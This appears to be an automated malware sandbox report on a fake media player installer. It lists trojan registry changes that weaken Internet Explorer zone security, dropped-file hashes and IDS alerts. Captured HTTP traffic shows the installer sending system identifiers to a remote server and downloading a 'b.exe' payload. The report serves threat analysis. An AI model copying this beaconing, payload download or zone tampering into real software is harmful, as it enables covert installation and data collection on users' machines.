"DisplayIcon" = "%Program Files%\Your Product\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"UninstallString" = "%Program Files%\Your Product\uninstall.exe /U:%Program Files%\Your Product\Uninstall\uninstall.xml"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"InstallLocation" = "%Program Files%\Your Product"
"URLInfoAbout" = "http://www.yourcompany.com"
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Contact" = "Your Company Support Department"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"DisplayName" = "Your Product"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 00 60 AE EB 24 2A E3 19 B4 23 65 1A D4 A7 6E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Your Product1.0]
"Publisher" = "Your Company"

The process chromeupdate.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A E7 12 98 0A 73 1B DF 13 86 55 77 36 1A D5 9D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
43e8f913fde18c9d26a5ef9fea97cfe7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\MediaPlayer__15159_il35679.exe
e47d6ec4ca18c28652cc9512416f49d2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\DivXInstaller.exe
ef609c21581a902f2f156f92477d91e4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\chromeupdate.exe
42971c53e22b8a4d1e67bcab1cb65af8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\msconfig.exe
c3f5f4a1fb69b5889f0bbb313cf6017f c:\Program Files\Your Product\lua5.1.dll
9bdcf813d65265255b820bc7a704da3c c:\Program Files\Your Product\uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Setup Factory Runtime
Product Version: 9.3.0.0
Legal Copyright: Setup Engine Copyright (c) 2004-2014 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf_launch.exe
Internal Name: suf_launch
File Version: 9.3.0.0
File Description: Setup Application
Comments: Created with Setup Factory
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 22296 22528 4.47735 c76b9ce587690b8a39ba7840b7dd540c
.rdata 28672 11906 12288 3.44864 e96aa4f970e6f6799910a72904df3100
.data 40960 6504 3072 1.79291 e504fdbba062ee9bbd9ac425a4f5c0f5
.rsrc 49152 114432 114688 5.20694 d1acdca72b7083ccd64674f12ec99111
.reloc 163840 4242 4608 2.5731 a88bdb6f651ecf67b1b3db4a2866ea4e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE SoundCloud Downloader Install Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 9386
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="main.css"
Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT
ETag: "9d7c4ddc39dddc3623e8a57e55afd079"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ihGFCsM8E_plzZ0J6HTBF9Hk8QKHpVjql3hy0vm1OaCsZhanKUhZog==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 937
Connection: keep-alive
Date: Fri, 18 Sep 2015 23:00:51 GMT
Content-Disposition: attachment; filename="footer_img.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "e2bf2d203887961a2e93c1a68b7e7534"
Accept-Ranges: bytes
Server: AmazonS3
Age: 22753
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fsZaDnw4YxQ1C1bo9ycU8q_uVjQ92b_dnFTMY4AfaH8i95_1ikRqTg==

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1262
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2897
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kneYqdjb33irVWIslI4GjhfH-yNyxQmdMbmQDpmUZ16MMWmiJQ7_0w==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1740
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="skip.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "7c96892b1948a6e97494e2d58cafe1c0"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -apQrhg9QXRCyPP2fyUgdtnxuF7SDjvFauvCwh7jqXMXzUZAdQOFvQ==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YEk9S8jOVorpCH9cVz6nyJEb5E_2Lk6eZPEudQm6PZYsuwBWQBxi_g==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:59 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2895
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kgsrX92jwc2x2VRBAYO3YeumSb004M1L2IJQauwWIBVZfBh1sNvEYQ==

<<< skipped >>>

GET /file/cmu9yf4p HTTP/1.1
Accept: */*
User-Agent: Setup Factory 9.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08
Vary: Accept-Encoding


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1xu-Tb0eahQbBrnmv2Hya2cf2FTzY-CyT1tuh8TZs_gM8s6rEt2W-A==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0kVL2SOnaBGzM82AJcrWkuDanxR0ra8f0cykqeuKfMoD75eZmEx2hQ==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LanaVVYEVn3lXNi5MFBKdcam9x24x111oxFaOberXB-tFe7IvO33vQ==

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png HTTP/1.1

Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 38013
Connection: keep-alive
Date: Wed, 09 Dec 2015 16:41:49 GMT
Content-Disposition: attachment; filename="left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "69024df30fda549f6ed20e0a65a7face"
Accept-Ranges: bytes
Server: AmazonS3
Age: 43706
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LBSU4KwL0l_MWmoVqRuvp8JV3C4H52Je9rOg2soOoU04syQnF7d68Q==

<<< skipped >>>

GET /V31/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadsoup.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69260
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:00:05 GMT
Last-Modified: Thu, 26 Nov 2015 15:03:49 GMT
ETag: "f96a7acecd2cfb0d4f3cfca235763504"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 3009
X-Cache: Hit from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 76rLksTr2aHXgtjcgEIqqSLYx8FbPDNzqvKkh14XRZ4mmm5ypuNJNA==

<<< skipped >>>

GET /cmu9yf4p HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/cmu9yf4p
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
Location: hXXp://uploaded.net/file/cmu9yf4p..Vary: Accept-Encoding..


POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&Sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=MediaPlayer__15159_il35679.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=MediaPlayer__15159_il35679&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAxMAA=&netfs=3&ts=1449723017&ver=1.1.5.55
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Thu, 10 Dec 2015 04:50:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1....      ..      ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0
1 Transitional//EN">.<html>. <head>. <meta
http-equiv="content-type" content="text/html; charset=UTF-8" /> .
<title>MediaPlayer</title>. <base href="h
ttp://VVV.download-way.com:80/index.php" />.<link rel="styleshee
t" type="text/css" href="hXXp://cdn2.downloadsoup.com/9ee1efd2-b9b2-40
3f-8f9a-5fc856fa00a3/main.css" /> <script type="text/java
script" src="hXXp://cdn1.downloadsoup.com/V31/amipb.js"></script
>. <script type="text/javascript">.var g_r__capp='Medi
aPlayer';.. var g_amiobj = '', g_ami, g_updb = false, g_clo
se = '1', g_additional_offer_list = '1';. var g_finish_inst
all_button = '1';. var g_popup_install_all = '1';.
var g_eula = 'QnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b
25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCB
NYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZXJ3aXNlIHVzaW5nIHRoZSBTb2Z0d2FyZ
SwgeW91IGFncmVlIHRvIGJlIGJvdW5kIGJ5IHRoZSB0ZXJtcyBvZiBJbnN0YWxsUGF0aCB
JbnN0YWxsIE1hbmFnZXIgaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vZXVsYS5odG1sI
ChFVUxBKSwgaXRzIGh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCA
oUHJpdmFjeSBQb2xpY3kpIGFuZCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS90ZXJtc
y5odG1sIChUZXJtcyBvZiBTZXJ2aWNlKS4gRm9yIGFueSBhZGRpdGlvbmFsIGluZm9ybWF
0aW9uIG9uIEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlciB5b3UgY2FuIHZpc2l0IEluc
3RhbGxQYXRoJ3Mgd2Vic2l0ZSBhdCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS8

<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.download-way.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 381
Connection: Keep-Alive
Cache-Control: no-cache

_hdn=0&_ver=1.1.5.55&_p=1&_s=20&_cc=UA&_cid=15159&_psb=0&_cnt=77cf2e0adca2896b80870fc402dc2b9b&_instid=l35679&_brw=ie&_fc=216&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_MediaPlayer=0&r_updater=0.01&r_NationZoom=1&r_OperaRUnew=2&r_AmigoIM=5&r_AnySend=1&r_OperaWW=2&r_PPSvideoPlayer=1&MediaPlayer=3&updater=2&NationZoom=1&OperaRUnew=1&AmigoIM=1&AnySend=1&OperaWW=1&PPSvideoPlayer=1
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 10 Dec 2015 04:50:13 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 3285
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>MediaPlayer</comps><
short_name>MediaPlayer</short_name><must_show>0</mus
t_show><bdy>CiAgICAgICAgCjxkaXYgaWQ9ImFtaV9kaXNwbGF5X2JvZHkiP
goJPGRpdiBpZD0iYW1pX2xlZnRfaW1hZ2UiPgkKCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5
rcyI+CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kua
HRtbCAiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Qcml2YWN5IFB
vbGljeTwvYT48YnIgLz4KCQkJPGEgaHJlZj0iaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb
20vaW5kZXguaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkh
lbHA8L2E+PGJyIC8+CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL
2NvbnRhY3QtdXMuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGU
iPkNvbnRhY3QgdXM8L2E+CgkJPC9kaXY+Cgk8L2Rpdj4KCTxkaXYgaWQ9ImFtaV9ib2R5X
3RleHQiPgoJCTxkaXYgaWQ9ImFtaV9kZWNfZGl2Ij4JCgkJCTxzcGFuIGlkPSJhbWlfZGV
jX3RpdGxlIj5XZWxjb21lIHRvIHRoZSBWTEMgTWVkaWEgUGxheWVyIFNldHVwIFdpemFyZ
Dwvc3Bhbj4KCQkJPHAgaWQ9ImFtaV9kZWNfaW5mbyI+CgkJCSAgRm9sbG93IHRoZSBvbi1
zY3JlZW4gb3V0bGluZWQgdGhpcyB3aXphcmQgdG8gaW5zdGFsbCB0aGUgbmV3IHZlcnNpb
24gb2YgVkxDIE1lZGlhIFBsYXllcgoJCQkgIGFuZCBiZW5lZml0IGZyb20gYWxsIHRoZSB
sYXRlc3QgZmVhdHVyZXMgYW5kIHVwZGF0ZXMgVkxDIE1lZGlhIFBsYXllciBoYXMgdG8gb
2ZmZXIuCgkJCTwvcD4KCQkgIDxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlBsZWFzZSB0byB
jb250aW51ZSB3aXRoIHRoZSBpbnN0YWxsYXRpb24gc2VsZWN0IHlvdXIgZGVzaXJlZCBvc
HRpb246PC9zcGFuPgoJCTwvZGl2PgoJCQkJCgkJPGRpdiBpZD0iZF9hbWlfTWVkaWF

<<< skipped >>>

GET /dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 HTTP/1.1
Accept: */*
Host: fra-7m22-stor05.uploaded.net
User-Agent: Setup Factory 9.0
Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: application/octet-stream
Content-Length: 2861977
Last-Modified: Wed, 09 Dec 2015 20:37:36 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="b.exe"
ETag: "56689110-2bab99"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2...\...\.
..\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\...
......PE..L...,-.T.................X...........).......p....@.........
.................P......J6....@.................................<..
.d........n...................0.......................................
...@............p..x............................text....W.......X.....
............. ..`.rdata.......p...0...\..............@[email protected]....
[email protected]..................@[email protected]
[email protected].................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U...X......... [email protected].
